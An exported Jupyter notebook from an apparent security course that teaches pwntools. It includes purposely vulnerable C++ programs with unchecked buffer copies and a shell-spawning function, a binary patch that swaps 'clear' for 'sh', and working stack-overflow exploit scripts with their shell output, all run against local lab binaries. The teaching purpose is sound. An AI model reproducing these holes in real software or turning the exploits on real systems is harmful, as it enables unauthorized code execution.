# Pwntools Python Framework

- Complete Tutoraials found here: [https://github.com/Gallopsled/pwntools-tutorial](https://github.com/Gallopsled/pwntools-tutorial)
- Documentation on Pwntools found here: [https://docs.pwntools.com/en/stable/about.html](https://docs.pwntools.com/en/stable/about.html)


- this notebook provides quick tutorials and demos on most common tasks used in basic binary exploitations

## Pwntools Introduction

- a grab-bag of tools to make exploitation during CTFs as painless as possible, and to make exploits as easy to read as possible
- makes it easy to do a local exploit, remote exploit or exploit over SSH with a one-line change
- has two main main modules: `pwn` and `pwnlib`

### pwn - Toolbox optimized for CTFs

- `import pwn` or ` from pwn import *` - you'll have access to everythin you need to write an exploit
- we'll see pwntools usage and demos specific to CTFs in [CTF](./CTF.ipynb) notebook
- install pwntools with python package manager `pip`

### Caveat
- pwntools is generated for exploiting binary programing written in C and NOT CPP
- for binary written in C++, one has to work a little harder and know underlying basics of pwntools and binary generated by C++ compiler such as g++

### Installation
- install the release version on Linux using the following instructions

In [ ]:
%%bash
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

#### help

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ pwn -h                                                                                  2 ⨯
usage: pwn [-h]
           {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
           ...

Pwntools Command-line Interface

positional arguments:
  {asm,checksec,constgrep,cyclic,debug,disasm,disablenx,elfdiff,elfpatch,errno,hex,phd,pwnstrip,scramble,shellcraft,template,unhex,update,version}
    asm                 Assemble shellcode into bytes
    checksec            Check binary security settings
    constgrep           Looking up constants from header files. Example: constgrep -c freebsd
                        -m ^PROT_ '3 + 4'
    cyclic              Cyclic pattern creator/finder
    debug               Debug a binary in GDB
    disasm              Disassemble bytes into text format
    disablenx           Disable NX for an ELF binary
    elfdiff             Compare two ELF files
    elfpatch            Patch an ELF file
    errno               Prints out error messages
    hex                 Hex-encodes data provided on the command line or stdin
    phd                 Pwnlib HexDump
    pwnstrip            Strip binaries for CTF usage
    scramble            Shellcode encoder
    shellcraft          Microwave shellcode -- Easy, fast and delicious
    template            Generate an exploit template
    unhex               Decodes hex-encoded data provided on the command line or via stdin.
    update              Check for pwntools updates
    version             Pwntools version

optional arguments:
  -h, --help            show this help message and exit
```

In [ ]:
! pwn update

In [24]:
!pwd

/workspaces/SoftwareSecurity/demos/pwntools-demos


In [25]:
%cd ..

/workspaces/SoftwareSecurity/demos


In [26]:
! pwn elfdiff ./hello.exe ./hello.exe

In [5]:
! g++ -o hello.exe hello.cpp

In [6]:
! gcc -o hello_c.exe hello.c

In [7]:
! pwn elfdiff ./hello.exe ./hello_c.exe

6c6
< start address 0x00000000000010c0
---
> start address 0x0000000000001060
14c14
<          filesz 0x0000000000000840 memsz 0x0000000000000840 flags r--
---
>          filesz 0x00000000000005f8 memsz 0x00000000000005f8 flags r--
16c16
<          filesz 0x00000000000002d5 memsz 0x00000000000002d5 flags r-x
---
>          filesz 0x00000000000001f5 memsz 0x00000000000001f5 flags r-x
18,22c18,22
<          filesz 0x00000000000001b0 memsz 0x00000000000001b0 flags r--
<     LOAD off    0x0000000000002d78 vaddr 0x0000000000003d78 paddr 0x0000000000003d78 align 2**12
<          filesz 0x0000000000000298 memsz 0x00000000000003e0 flags rw-
<  DYNAMIC off    0x0000000000002d90 vaddr 0x0000000000003d90 paddr 0x0000000000003d90 align 2**3
<          filesz 0x0000000000000200 memsz 0x0000000000000200 flags rw-
---
>          filesz 0x0000000000000160 memsz 0x0000000000000160 flags r--
>     LOAD off    0x0000000000002db8 vaddr 0x0000000000003db8 paddr 0x0000000000003db8 align 2**12
>          fil

In [ ]:
! pwn phd ./hello.exe

00000000  7f 45 4c 46  02 01 01 00  00 00 00 00  00 00 00 00  │·ELF│····│····│····│
00000010  03 00 3e 00  01 00 00 00  c0 10 00 00  00 00 00 00  │··>·│····│····│····│
00000020  40 00 00 00  00 00 00 00  e8 3b 00 00  00 00 00 00  │@···│····│·;··│····│
00000030  00 00 00 00  40 00 38 00  0d 00 40 00  1f 00 1e 00  │····│@·8·│··@·│····│
00000040  06 00 00 00  04 00 00 00  40 00 00 00  00 00 00 00  │····│····│@···│····│
00000050  40 00 00 00  00 00 00 00  40 00 00 00  00 00 00 00  │@···│····│@···│····│
00000060  d8 02 00 00  00 00 00 00  d8 02 00 00  00 00 00 00  │····│····│····│····│
00000070  08 00 00 00  00 00 00 00  03 00 00 00  04 00 00 00  │····│····│····│····│
00000080  18 03 00 00  00 00 00 00  18 03 00 00  00 00 00 00  │····│····│····│····│
00000090  18 03 00 00  00 00 00 00  1c 00 00 00  00 00 00 00  │····│····│····│····│
000000a0  1c 00 00 00  00 00 00 00  01 00 00 00  00 00 00 00  │····│····│····│····│
000000b0  01 00 00 00  04 00 00 00  00 00 00 00  00 00 00 00  │····│····│···

###  Using Pwntools with Python Scripts

```python
from pwn import *
```

- import all the names in global scope

- see all the names imported into global namespace to make your life easier: 
[https://docs.pwntools.com/en/stable/globals.html](https://docs.pwntools.com/en/stable/globals.html)

## Tubes
- need to talk to the target binary in order to `pwn` it!
- pwntools makes it a breeze...
- unlike other Python libraries, pwn doesn't seem to work directly on Jupyter Notebook that uses IPython
- let's use Python prompt on termial to demostrate some quick one liners for basic io
- see details: https://github.com/Gallopsled/pwntools-tutorial/blob/master/tubes.md
    

```bash

┌──(kali㉿K)-[~/EthicalHacking]
└─$ python                                                                                127 ⨯
Python 3.8.5 (default, Sep  4 2020, 07:30:14) 
[GCC 7.3.0] :: Anaconda, Inc. on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> sh = process('sh')
[x] Starting local process '/usr/bin/sh'
[+] Starting local process '/usr/bin/sh': pid 16126

```

In [9]:
from pwn import *

In [11]:
sh = process('sh')

[x] Starting local process '/usr/bin/sh'
[+] Starting local process '/usr/bin/sh': pid 4322


####  Basic IO
- `recv(n)` - Recieves any number of available bytes
- `recvline()` - Receives data until a newline is encountered
- `recvuntil(delim)` - Receives data until a delimeter is encountered
- `send(data)` - Sends data
- `sendline(data)` - Sends data plus a newline char
- `clean()` - Discard all buffered data

```bash
>>> sh.sendline(b'sleep 3; echo Hello World!;')
>>> print(sh.recvline())
b'Hello World!\n'
```

In [12]:
sh.sendline(b'sleep 3; echo hello world')

In [13]:
sh.recvline()

b'hello world\n'

In [14]:
sh.sendline(b'echo $((2+10))')

In [15]:
print(sh.recvline().decode('utf-8'))

12



#### Interactive sessions
- let's pretend you land a shell on some remote server
- interactive mode doesn't work on Jupyter Notebook
- see script examples in `demos/pwntools-demos/basic_io` folder

```bash
>>> sh.interactive()
[*] Switching to interactive mode

whoami  
kali
date
Fri 18 Dec 2020 12:28:44 PM MST

exit
[*] Got EOF while reading in interactive

[*] Process '/bin/sh' stopped with exit code 0 (pid 16145)
[*] Got EOF while sending in interactive
```

- compile `demos/pwntools-demos/basic_io/io_demo.cpp` file
- manually run the file first then run the following pwn_io_demo.py script to automatically interact with the binary

In [27]:
! pwd

/workspaces/SoftwareSecurity/demos


In [28]:
! cat pwntools-demos/basic_io/io_demo.cpp

#include <iostream>
#include <string>

using namespace std;

int main() {
    string name, address;
    int age;
    cout << "Enter your name:\n";
    getline(cin, name);
    cout << "Enter your age:\n";
    cin >> age;
    cout << "Enter your address:\n";
    cin >> ws;
    getline(cin, address);
    cout << "Hello, " << name << "! "
     << "Your're " << age << " old. "
     << "Your address is " << address << endl;
    cout << "Good bye!\n";
    return 0;
}

In [23]:
! ls

basic_exploit  basic_io  core-files  demo.cpp


In [29]:
%%bash
input="pwntools-demos/basic_io/io_demo.cpp"
output="io_demo.exe"
sudo ./compile.sh $input $output

In [30]:
! cat pwntools-demos/basic_io/pwn_io_demo.py

#!/usr/bin/env python

import pwn

# run process to interact with
io = pwn.process('./io_demo.exe')

# programmatically receive and use data

prompt = io.recvline(False)
print(f'prompt:  {prompt}')
# receives bytes array
if prompt.endswith(b'name:'):
    io.sendline(b"John Smith")

prompt = io.recvuntil(b"age:")
print(f"prompt = {prompt}")
# can only send bytes and string
io.sendline(b'21')

prompt = io.recvuntil(b"address:")
print(f"prompt = {prompt}")

io.sendline(b"111 North Street GJ CO 1111!")
print(f'{io.recv()}') # receive and discard \n
print(f'{io.recvline()}') # includes \n
print(io.recvline().decode('utf-8'), end='')

#io.interactive()


In [31]:
! python pwntools-demos/basic_io/pwn_io_demo.py

[x] Starting local process './io_demo.exe'
[+] Starting local process './io_demo.exe': pid 8336
prompt:  b'Enter your name:'
prompt = b'Enter your age:'
prompt = b'\nEnter your address:'
b'\n'
b"Hello, John Smith! Your're 21 old. Your address is 111 North Street GJ CO 1111!\n"
Good bye!
[*] Stopped process './io_demo.exe' (pid 8336)


## Utility Functions
- half of Pwntools is utility functions so that you no longer need to copy paste things
- see here - https://github.com/Gallopsled/pwntools-tutorial/blob/master/utility.md

### Packing and Unpacking Integers

- integers such as memory addresses need to be sent to the target program according to it's endianness (x86 is little endian)
- pwntools can detect and automatically pack and unpack integers according to the endianness of the target program

- `pack()` - create word-size (4 bytes) packed (endian-aware) integer
    - help(pack)
- `unpack()` - unpacks a word-size integer (endian-aware)
    - help(unpack)
- `p32()` - pack an integer as 32-bit binary value
    - help(p32)
- `u32()` - unpack packed binary into integer value
    - help(u32)
- also has API to pack and unpack into 8, 16, 64-bit, and archetecture specific integer representations

In [8]:
help(pack)

Help on function pack in module pwnlib.util.packing:

pack(number, word_size=None, endianness=None, sign=None, **kwargs)
    pack(number, word_size = None, endianness = None, sign = None, **kwargs) -> str

    Packs arbitrary-sized integer.

    Word-size, endianness and signedness is done according to context.

    `word_size` can be any positive number or the string "all". Choosing the
    string "all" will output a string long enough to contain all the significant
    bits and thus be decodable by :func:`unpack`.

    `word_size` can be any positive number. The output will contain word_size/8
    rounded up number of bytes. If word_size is not a multiple of 8, it will be
    padded with zeroes up to a byte boundary.

    Arguments:
        number (int): Number to convert
        word_size (int): Word size of the converted integer or the string 'all' (in bits).
        endianness (str): Endianness of the converted integer ("little"/"big")
        sign (str): Signedness of the convert

In [9]:
pack(1)

b'\x01\x00\x00\x00'

In [10]:
help(unpack)

Help on function unpack in module pwnlib.util.packing:

unpack(data, word_size=None)
    unpack(data, word_size = None, endianness = None, sign = None, **kwargs) -> int

    Unpacks arbitrary-sized integer.

    Word-size, endianness and signedness is done according to context.

    `word_size` can be any positive number or the string "all". Choosing the
    string "all" is equivalent to ``len(data)*8``.

    If `word_size` is not a multiple of 8, then the bits used for padding
    are discarded.

    Arguments:
        number (int): String to convert
        word_size (int): Word size of the converted integer or the string "all" (in bits).
        endianness (str): Endianness of the converted integer ("little"/"big")
        sign (str): Signedness of the converted integer (False/True)
        kwargs: Anything that can be passed to context.local

    Returns:
        The unpacked number.

    Examples:

        >>> hex(unpack(b'\xaa\x55', 16, endian='little', sign=False))
        '0x55

In [11]:
unpack(b'\x01\x00\x00\x00')

1

In [12]:
p32(1)

b'\x01\x00\x00\x00'

In [13]:
p32(2**32-1)

b'\xff\xff\xff\xff'

In [14]:
p32(1, endian='big')

b'\x00\x00\x00\x01'

In [15]:
p16(1)

b'\x01\x00'

In [16]:
p64(1)

b'\x01\x00\x00\x00\x00\x00\x00\x00'

In [17]:
p32(0xdeadbeef, endian='big')

b'\xde\xad\xbe\xef'

In [18]:
ret_add = add = p32(0xdeadbeef) # little endian

In [19]:
ret_add

b'\xef\xbe\xad\xde'

In [20]:
print(u32(ret_add))

3735928559


In [21]:
hex(u32(ret_add))

'0xdeadbeef'

## ELFs
- https://github.com/Gallopsled/pwntools-tutorial/blob/master/elf.md
- `ELF` class makes it easy to interact with ELF files

```bash
>>> from pwn import *
>>> ELF('/bin/bash')
[*] '/bin/bash'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled
ELF('/bin/bash')

```

### Using Symbols

- ELF files have several sets of symbols available
- symbols are contained in respective dictionary `{name: data}`
    - ELF.symbols - lists all known symbols, including those below. Preference is given the PLT entries over GOT entries.
    - ELF.got - only contains GOT entries
        - Global Offsets Table is used to resolve addresses of global variables and functions
    - ELF.plt only contains PLT entries
        - Procedure Linkage Table is used to call external/library procedures/functions whose address isn't known in the time of linking, and is left to be resolved by the dynamic linker at run time
        - once the address of functions are resolved they're cached in GOT for faster lookup
    - ELF.functions - only contains functions (requires DWARF symbols)
- more on PLT and GOT read [this](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html)
- Let's compile and and read ELF of `demos/pwntools-demos/basic_exploit/vuln.cpp` program

In [38]:
! cat pwntools-demos/demo.cpp

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <iostream>
using namespace std;

void get_shell() {
    system("sh");
}

void bad() {
    char buffer[64];
    printf("Enter some text: ");
    cin >> buffer;
    printf("You entered: %s\n", buffer);
}

int main(int argc, char** argv) {
    printf("Welcome... Enter to continue.\n");
    cin.get();
    system("clear");
    bad();
    printf("Good bye!\n");
    return 0;
}


In [39]:
%%bash
input="pwntools-demos/demo.cpp"
output="demo.exe"
echo kali | sudo -S ./compile.sh $input $output

pwntools-demos/demo.cpp: In function ‘int main(int, char**)’:
pwntools-demos/demo.cpp:19:14: warning: unused parameter ‘argc’ [-Wunused-parameter]
   19 | int main(int argc, char** argv) {
      |          ~~~~^~~~
pwntools-demos/demo.cpp:19:27: warning: unused parameter ‘argv’ [-Wunused-parameter]
   19 | int main(int argc, char** argv) {
      |                    ~~~~~~~^~~~


In [40]:
# let's find the address of get_shell using nm program
! nm demo.exe | grep get_shell

080493b6 t _GLOBAL__sub_I__Z9get_shellv
08049256 T _Z9get_shellv


In [35]:
from pwn import *

In [ ]:
# let's load the binary contents using ELF class
e = ELF('./demo.exe')

[*] '/workspaces/SoftwareSecurity/demos/demo.exe'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x8048000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes


In [34]:
# let's see all the symbols; a python dictionary
e.symbols

{'_IO_stdin_used': 134520836,
 '': 134529076,
 'deregister_tm_clones': 134517152,
 'register_tm_clones': 134517216,
 '__do_global_dtors_aux': 134517280,
 'completed.7623': 134529076,
 '__do_global_dtors_aux_fini_array_entry': 134528768,
 'frame_dummy': 134517328,
 '__frame_dummy_init_array_entry': 134528760,
 '_ZStL8__ioinit': 134529077,
 '_Z41__static_initialization_and_destruction_0ii': 134517593,
 '_GLOBAL__sub_I__Z9get_shellv': 134517686,
 '__FRAME_END__': 134521488,
 '__GNU_EH_FRAME_HDR': 134520924,
 '_DYNAMIC': 134528772,
 '__init_array_end': 134528768,
 '__init_array_start': 134528760,
 '_GLOBAL_OFFSET_TABLE_': 134529024,
 '__x86.get_pc_thunk.ax': 134517726,
 '_edata': 134529076,
 '_Z9get_shellv': 134517334,
 'data_start': 134529068,
 '_fp_hw': 134520832,
 'main': 134517471,
 '_Z3badv': 134517381,
 '__dso_handle': 134529072,
 '_fini': 134517868,
 '_dl_relocate_static_pie': 134517120,
 '__x86.get_pc_thunk.bx': 134517136,
 '__x86.get_pc_thunk.bp': 134517861,
 '_start': 134517056,


In [37]:
e.functions

{'_Z41__static_initialization_and_destruction_0ii': Function(name='_Z41__static_initialization_and_destruction_0ii', address=0x8049359, size=0x5d, elf=ELF('/workspaces/SoftwareSecurity/demos/demo.exe')),
 '_GLOBAL__sub_I__Z9get_shellv': Function(name='_GLOBAL__sub_I__Z9get_shellv', address=0x80493b6, size=0x28, elf=ELF('/workspaces/SoftwareSecurity/demos/demo.exe')),
 '_Z9get_shellv': Function(name='_Z9get_shellv', address=0x8049256, size=0x2f, elf=ELF('/workspaces/SoftwareSecurity/demos/demo.exe')),
 'main': Function(name='main', address=0x80492df, size=0x7a, elf=ELF('/workspaces/SoftwareSecurity/demos/demo.exe')),
 '_Z3badv': Function(name='_Z3badv', address=0x8049285, size=0x5a, elf=ELF('/workspaces/SoftwareSecurity/demos/demo.exe')),
 '_dl_relocate_static_pie': Function(name='_dl_relocate_static_pie', address=0x8049180, size=0x5, elf=ELF('/workspaces/SoftwareSecurity/demos/demo.exe')),
 '__x86.get_pc_thunk.bx': Function(name='__x86.get_pc_thunk.bx', address=0x8049190, size=0x4, elf

In [ ]:
# look at individual entry in symbols table
print(f'{e.symbols["main"]:#010x}')

0x080492df


In [ ]:
# look at individual entry in got table
print(f'{e.got["printf"]:#010x}')

0x0804c01c


In [ ]:
# look at individual entry in plt table
print(f'{e.plt["printf"]:#010x}')

0x08049104


In [ ]:
# look at individual entry in functions and it's address vale
print(f'{e.functions["main"].address:#010x}')

0x080492df


In [ ]:
# use get method instead of [] operator to avoid exception
get_shell = e.symbols.get('_Z9get_shellv')

In [51]:
print(hex(get_shell))

0x8049256


In [41]:
print(f'{get_shell:#010x}')

0x08049256


In [42]:
# programmatically find the address of get_shell function
for key in e.functions:
    if 'get_shell' in key:
        print(f'{key} {e.functions[key].address:#010x}')

_GLOBAL__sub_I__Z9get_shellv 0x080493b6
_Z9get_shellv 0x08049256


### Reading ELF Files
- interact with ELF as if it were loadded into memory
- use `read`, `write`, `pack`, `unpack`, `disasm`, etc. methods to interact

In [43]:
get_shell = e.symbols.get('_Z9get_shellv')

In [45]:
print(f'{get_shell:#010x}')

0x08049256


In [52]:
# read 14 bytes from starting of get_shell() location
e.read(get_shell, 14)

b'\xf3\x0f\x1e\xfbU\x89\xe5S\x83\xec\x04\xe8x\x01'

In [53]:
# print 4 bytes from the beginning of the e's address in memory
print(e.read(e.address, 4))

b'\x7fELF'


In [ ]:
# disassemble the 14 bytes from the starting of get_shell() location
print(e.disasm(get_shell, 14))

 8049256:       f3 0f 1e fb             endbr32 
 804925a:       55                      push   ebp
 804925b:       89 e5                   mov    ebp, esp
 804925d:       53                      push   ebx
 804925e:       83 ec 04                sub    esp, 0x4
 8049261:       e8                      .byte 0xe8
 8049262:       78 01                   js     0x8049265


### Patching ELF Files
- modify/patch ELF files
- let's modify `clear` with `sh` to get a shell

In [ ]:
e = ELF('./demo.exe')

In [ ]:
# returns an iterator
e.search(b'clear')

In [55]:
# convert the first address of the string 'clear' in the binary into hex
hex(next(e.search(b'clear')))

'0x804a04c'

In [ ]:
# read the 5 characters from the address of the string 'clear'
e.read(0x804a04c, 5)

b'clear'

In [ ]:
# patch the binary by replacing the string 'clear' with 'sh\x00'
e.write(next(e.search(b'clear')), b'sh\x00')

In [ ]:
# save the patched binary
e.save('./demo_mod.exe')

In [ ]:
! ls -al ./demo_mod.exe

In [ ]:
! chmod +x ./demo_mod.exe

In [ ]:
! ls -al ./demo_mod.exe
# run the demo_mod.exe from a terminal

### Generating Unique Cyclic sequences
- inorder to find offset, we need to generate a cyclic pattern long enough to crash the target program by over-writing the caller's return address

- `cyclic(length, n)` - Generates a length of the sequence that should be `n` character unique
- `cyclic_find(subsequence, n)` - Finds subsequence that's `n` bytes unique; return positive index for -1 (if subsequence not found)

- create a cyclic pattern of size 20 with group of 8 unique characters

```bash
>>> cyclic(20, n=8)
b'aaaaaaaabaaaaaaacaaa'
```

- search 8 a's subsequence in cyclic pattern

```bash
>>> cyclic_find('aaaaaaaa', n=8)
0

```

### Core dump and offset

- see `demos/pwntools_demos/core_files` to find offset from core dump files

In [ ]:
# generate a cyclic pattern of 10 characters with default length of 4
cyclic(10)

b'aaaabaaaca'

In [ ]:
# generate a cyclic pattern of 10 characters with length of 8
c = cyclic(20, n=8)

In [59]:
c

b'aaaaaaaabaaaaaaacaaa'

In [81]:
cyclic_find(c[:8], n=8)

0

In [60]:
cyclic_find('aaaaaaaa', n=8)

0

In [82]:
cyclic_find('aaaa')

0

In [61]:
cyclic_find('baaaaaaa', n=8)

8

In [83]:
cyclic_find('baaa')

4

### Shellcode
- pwntools provide shellcraft module to generate shellcode

- list available shellcode

```bash
$ shellcraft --help
$ shellcraft -l
$ shellcraft -l | grep i386.linux

```

- running a shellcode

```bash
┌──(kali㉿K)-[~]
└─$ shellcraft -r i386.linux.sh    
[!] Your binutils version is too old and may not work!
    Try updating with: https://docs.pwntools.com/en/stable/install/binutils.html
    Reported Version: "GNU assembler (crosstool-NG 1.23.0.444-4ea7) 2.31.1\nCopyright (C) 2018 Free Software Foundation, Inc.\nThis program is free software; you may redistribute it under the terms of\nthe GNU General Public License version 3 or later.\nThis program has absolutely no warranty.\nThis assembler was configured for a target of `x86_64-conda_cos6-linux-gnu'."
[*] '/tmp/pwn-asm-f0hjebqe/step3-elf'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8049000)
    RWX:      Has RWX segments
[+] Starting local process '/tmp/pwn-asm-f0hjebqe/step3-elf': pid 22485
[*] Switching to interactive mode
$ whoami
kali
$ 
```

## Basic exploit code development

- we'll use `demos/pwntools-demos/basic_exploit/vuln.cpp` file to demonstrate the basic exploit generation with pwntools

In [ ]:
! pwd

/workspaces/SoftwareSecurity/demos


In [63]:
! cat pwntools-demos/basic_exploit/vuln.cpp

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

void get_shell() {
    system("sh");
}

void bad(char * data) {
    char buffer[64];
    strcpy(buffer, data);
    printf("%s\n", buffer);
}

int main(int argc, char** argv) {
    bad(argv[1]);
}

- goal is to get the program execute `get_shell()` by overflowing the caller's return address in `bad()`
- let's see an example that uses gdb-peda and pwntools first, then we'll see an example using only pwntools

In [66]:
%%bash
input="pwntools-demos/basic_exploit/vuln.cpp"
output="pwntools-demos/basic_exploit/vuln_cpp.exe"
echo kali | sudo -S ./compile.sh $input $output

pwntools-demos/basic_exploit/vuln.cpp: In function ‘int main(int, char**)’:
pwntools-demos/basic_exploit/vuln.cpp:16:14: warning: unused parameter ‘argc’ [-Wunused-parameter]
   16 | int main(int argc, char** argv) {
      |          ~~~~^~~~


In [67]:
# run the target program passing "Hello World!" argument
! ./pwntools-demos/basic_exploit/vuln_cpp.exe "Hello World!"

Hello World!


In [68]:
# find offset using gdb-peda
! gdb -q --batch --command=./pwntools-demos/basic_exploit/find_offset.batch --args \
./pwntools-demos/basic_exploit/vuln_cpp.exe

Set 1 arguments to program
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xc9 
EBX: 0x41413341 ('A3AA')
ECX: 0xffffffff 
EDX: 0xffffffff 
ESI: 0xf7fb9000 --> 0x1e8d6c 
EDI: 0xf7fb9000 --> 0x1e8d6c 
EBP: 0x65414149 ('IAAe')
ESP: 0xffffb470 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41344141
[------------------------------------stack-------------------------------------]
0000| 0xffffb470 ("AJAAfAA5AAKAAgAA6AALA

In [69]:
! nm pwntools-demos/basic_exploit/vuln_cpp.exe | grep get_shell

080491d6 T _Z9get_shellv


In [70]:
# let's see the exploit code
! cat pwntools-demos/basic_exploit/exploit_vuln.py

#! /usr/bin/env python

from pwn import *

target_name = './vuln_cpp.exe'

offset = 76 #FIXME
# find address of get_hell function
get_shell = p32(0x08049176) #b"\x82\x91\x04\x08" # FIXME
payload = b'A'*offset+get_shell
print(f'{payload} has length {len(payload)}')

# run target program with the payload as an argument
io = process([target_name, payload])

# Get a shell!
io.sendline(b'id')
print(io.recvline())

# get interactive shell
io.interactive()


- run the exploit
- get the shell!

```bash
┌──(kali㉿K)-[~/EthicalHacking/pwntools-demos/basic_exploit]
└─$ python exploit_vuln.py 
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08' has length 80
[+] Starting local process './vuln_cpp.exe': pid 17369
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x82\x91\x04\x08\n'
[*] Switching to interactive mode
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),141(kaboxer)
$ 
$ whoami
kali
$ date
Fri 18 Dec 2020 01:52:03 PM MST
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Process './vuln_cpp.exe' stopped with exit code -11 (SIGSEGV) (pid 17369)
[*] Got EOF while sending in interactive
```

### Exploit code with only pwntools API
- no gdb, and peda required for generating simple exploits
- we can use core dump to automatically find the offset and the controlled return address using pwntools
- check and set the coredump settings
- wrok directly on a Terminal if jupyter notebook doesn't work
- NOTE: if the vulnerable target program is `setuid` you must run the exploit code with sudo so the core dump can be accessed by the script for processing

In [74]:
# check if the kernel can store coredump of a program crash
# if it's 0, set it to unlimited
! ulimit -c

unlimited


In [ ]:
! ulimit -c unlimited

In [72]:
# jupyter notebook still says 0; check it on the terminal
! ulimit -c

unlimited


In [73]:
# check the coredump location and pattern
! cat /proc/sys/kernel/core_pattern

|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -- %E


In [75]:
# if it' not core, set it to store the coredump as core in the working directory
! echo kali | sudo -S sysctl -w kernel.core_pattern=core

kernel.core_pattern = core


In [76]:
# check the coredump location and pattern again and make sure its core
! cat /proc/sys/kernel/core_pattern

core


In [77]:
# -a option gives you all the settings
! ulimit -a

core file size          (blocks, -c) unlimited
data seg size           (kbytes, -d) unlimited
scheduling priority             (-e) 0
file size               (blocks, -f) unlimited
pending signals                 (-i) 31693
max locked memory       (kbytes, -l) 8192
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1048576
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) unlimited
max user processes              (-u) unlimited
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited


In [78]:
# double check to make sure file name prefix of core_pattern is core
! cat /proc/sys/kernel/core_pattern

core


In [84]:
! cat pwntools-demos/basic_exploit/exploit_vuln_cpp.py

#! /usr/bin/env python

# https://docs.pwntools.com/en/stable/elf/corefile.html

from pwn import *

target_name = './vuln_cpp.exe'
# Set up pwntools for the correct architecture
exe = context.binary = ELF(target_name)

# print(exe.symbols)

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(128)

# Run the process once so that it crashes
p = process([target_name, payload])
p.wait()  # wait for close

# Get the core dump of the crashed process
core = p.corefile

# read the core dump file directly
# core = Core('coredump_file')

# Our cyclic pattern should have been used as the crashing address, make sure!
# assert p32(core.eip) in payload
crash_ip = core.eip
offset = cyclic_find(crash_ip)
# offset = cyclic_find(core.read(core.esp, 4))-4
print(f'{offset=}')
# search for get_shell function address
# in C; func_address = exe.symbols.get_shell
# in C++; parse the symbols dictionary to look for function name in key
for symbol in exe.symbols.keys():
    if symbol

- for the above exploit code, everything needed to exploit the prgram is automatically determined using pwntools API except for the target program name

- run the exploit and enjoy the shell

```bash
                                                                                           
@rambasnet ➜ /workspaces/…/demos/pwntools-demos/basic_exploit (main) $ python exploit_vuln_cpp.py 
[*] '/workspaces/SoftwareSecurity/demos/pwntools-demos/basic_exploit/vuln_cpp.exe'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x8048000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
    Debuginfo:  Yes
[+] Starting local process './vuln_cpp.exe': pid 24733
[*] Process './vuln_cpp.exe' stopped with exit code -11 (SIGSEGV) (pid 24733)
[+] Parsing corefile...: Done
[*] '/workspaces/SoftwareSecurity/demos/pwntools-demos/basic_exploit/core.24733'
    Arch:      i386-32-little
    EIP:       0x61616161
    ESP:       0xffffb0b0
    Exe:       '/workspaces/SoftwareSecurity/demos/pwntools-demos/basic_exploit/vuln_cpp.exe' (0x8048000)
    Fault:     0x61616161
/usr/local/python/3.12.1/lib/python3.12/site-packages/pwnlib/context/__init__.py:1709: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  return function(*a, **kw)
[+] Starting local process './vuln_cpp.exe': pid 24736
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd6\x91\x04\x08\n'
b'uid=1000(codespace) gid=1000(codespace) groups=1000(codespace),106(ssh),107(docker),989(pipx),990(python),991(oryx),992(golang),993(sdkman),994(rvm),995(php),996(conda),997(nvs),998(nvm),999(hugo)\n'
[*] Switching to interactive mode
$ whoami
codespace
$ ls
compile.sh    exploit_vuln.py      find_offset.batch              vuln.c
compile_c.sh  exploit_vuln_c.py    peda-session-vuln_c.exe.txt    vuln.cpp
